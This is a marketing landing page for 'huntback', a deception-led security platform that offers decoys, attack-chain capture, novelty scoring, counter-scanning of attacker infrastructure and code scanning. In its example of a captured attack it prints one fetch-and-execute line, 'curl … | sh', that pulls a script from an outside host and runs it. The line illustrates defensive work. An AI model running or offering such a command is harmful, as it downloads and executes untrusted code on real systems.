Deception-led security, built by threat hunters

Don't just detect. Hunt back.

huntback turns every attack into intelligence. Decoys capture the full attack chain, we score what is genuinely new, then hunt the attacker's own infrastructure. Plus dev-first code security to close the holes they are looking for.

Start free See how we operate No credit card. Deploy your first decoy in minutes.
0detectable CVEs tracked
0CVEs in the intel catalog
0kattack events captured
0hostile CIDRs mapped
How we operate

The loop that turns attacks into your advantage

Most tools stop at the log line. huntback follows the attacker from the first probe to their own tooling, and feeds every step back into your defence.

1
LureDecoys emulate your stack
2
CaptureFull chain, not a log line
3
ScoreNovelty vs evidence, separated
4
Hunt backCounter-scan attacker infra
5
DefendClose the holes they probe

Lure them in

Spin up decoys that look and respond exactly like the products in your stack, deployed across the internet where attackers hunt. To them it is a real, vulnerable target.

# a decoy comes up as an F5 BIG-IP, an ERP, a router...
decoy erp-suite live at 4 edge locations
decoy f5-bigip live, replaying byte-exact fixtures
# nothing on it is real. every touch is an attacker.

Capture the whole chain

We record the full interaction: request bytes and headers, the exploit payload, the session across IP rotation, and the stage-2 loader it tries to pull.

POST /api/v4/agent/provision (session c:sess_9f, 2 IPs)
body: curl -s http://198.51.100.7/x | sh
captured entry vector + stage-2 URL + full headers

Score what is genuinely new

Novelty of the entry vector is scored separately from exploitation evidence. A known CVE sprayed a million times scores low. A familiar loader through an unseen endpoint scores high.

Mozi loader via /shell? interest 8 known entry
same loader via /api/v4/agent interest 70 novel entry
CVE-2024-4577 canned probe interest 14 known

Hunt back

With one click, the disposable fleet scans the attacker's own infrastructure from a burner egress, maps their open ports and services, and harvests the malware they are staging.

scan 198.51.100.7 (dropper host)
open: 22, 80, 58191 server: nginx
loot apache.selfrep sha256 9f3a.. deduped

Defend where it matters

Everything feeds forward. The exploits actually hitting decoys tune your code scanner and CVE watch, so you fix the holes attackers are really probing, not a generic backlog.

CVE-2024-4577 exploited in the wild (seen on decoys)
your repo uses php-cgi -> AutoFix PR opened
# the loop closes.
One platform, four fronts

Deceive. Hunt. Code. Surface.

Each front stands on its own, and each one makes the others sharper.

huntback / deceive

A network of decoys that emulate your real stack and capture the full attack chain, not just a log line.

  • Decoy fleet
  • Byte-exact fixtures
  • Session capture
  • Loot harvesting
🎯

huntback / hunt

Novel-attack discovery, attacker-infrastructure counter-recon, and live CVE exploitation intelligence.

  • Discovery queue
  • Counter-recon
  • Novelty scoring
  • CVE intel
{}

huntback / code

Dev-first AppSec: SAST, SCA, secrets, SBOM, IaC, deep PR review and one-click AutoFix.

  • SAST
  • SCA
  • Secrets
  • SBOM
  • PR review
  • AutoFix
🔎

huntback / surface

Domain, brand and certificate intelligence. Know your exposure before attackers do.

  • Domain scan
  • Brand protection
  • Cert intel
  • Typosquats
Solutions by use case

Put deception to work

CVE intelligence

See who is exploiting a CVE, right now

A permalink for every CVE, backed by live exploitation from our sensor network. This is what a scanner list can never tell you.

CVE-2024-4577exploited in the wild
ProductPHP-CGI argument injection
EPSS0.94 (94th pct)
On our sensors (30d)3,572 attempts / 91 sources
Network detectableyes, signatured

Every CVE gets an indexable page: description, EPSS and KEV status, whether it is network-detectable, and a live count of exploitation seen on huntback decoys.

Browse CVE intelligence

Turn the tables on your attackers

Deploy your first decoy, connect a repo, and watch the intelligence roll in.